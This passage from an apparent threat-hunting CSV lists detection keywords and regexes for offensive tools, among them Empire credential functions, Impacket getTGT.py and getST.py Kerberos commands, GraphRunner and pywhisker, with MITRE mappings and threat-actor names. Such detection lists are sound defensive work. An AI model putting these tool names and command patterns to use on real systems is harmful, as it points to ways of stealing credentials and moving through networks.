T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*Get-SitelistFields*",".{0,1000}Get\-SitelistFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SiteListPassword*",".{0,1000}Get\-SiteListPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SiteListPassword*",".{0,1000}Get\-SiteListPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SiteListPassword*",".{0,1000}Get\-SiteListPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1121","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getsploit*",".{0,1000}getsploit.{0,1000}","offensive_tool_keyword","getsploit","Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB. Metasploit. Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.","T1583 - T1584 - T1586","TA0007","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/getsploit","1","0","N/A","N/A","10","1696","242","2023-03-27T15:18:55Z","2017-06-04T09:31:44Z" "*Get-SPN.ps1*",".{0,1000}Get\-SPN\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1114","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-spns All*",".{0,1000}get\-spns\sAll.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*get-spns ASREP*",".{0,1000}get\-spns\sASREP.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*get-spns spns*",".{0,1000}get\-spns\sspns.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*Get-SQLInstanceDomain*",".{0,1000}Get\-SQLInstanceDomain.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SQLInstanceDomain.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SQLInstanceDomain.ps1*",".{0,1000}Get\-SQLInstanceDomain\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1082","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SqlServerLinkCrawl*",".{0,1000}Get\-SqlServerLinkCrawl.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Automatically find all linked databases","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-SQLServerLoginDefaultPw*",".{0,1000}Get\-SQLServerLoginDefaultPw.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SQLServerLoginDefaultPw*",".{0,1000}Get\-SQLServerLoginDefaultPw.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1097","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SQLSysadminCheck*",".{0,1000}Get\-SQLSysadminCheck.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getST.py * -spn *",".{0,1000}getST\.py\s.{0,1000}\s\-spn\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*getST.py -k -no-pass -spn*",".{0,1000}getST\.py\s\-k\s\-no\-pass\s\-spn.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*getST.py -spn *",".{0,1000}getST\.py\s\-spn\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*GetSyscallStub.nim*",".{0,1000}GetSyscallStub\.nim.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*Get-System.ps1*",".{0,1000}Get\-System\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SystemDNSServer.ps1*",".{0,1000}Get\-SystemDNSServer\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SystemDNSServer.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SystemNamedPipe*",".{0,1000}Get\-SystemNamedPipe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-TeamsChat *",".{0,1000}Get\-TeamsChat\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Get-TeamsChat*Downloads full Teams chat conversations*",".{0,1000}Get\-TeamsChat.{0,1000}Downloads\sfull\sTeams\schat\sconversations.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*getTGT.py -dc-ip *",".{0,1000}getTGT\.py\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*getTGT.py -dc-ip*",".{0,1000}getTGT\.py\s\-dc\-ip.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*getTGT.py*",".{0,1000}getTGT\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*gettgtpkinit.py -cert-pfx *",".{0,1000}gettgtpkinit\.py\s\-cert\-pfx\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - 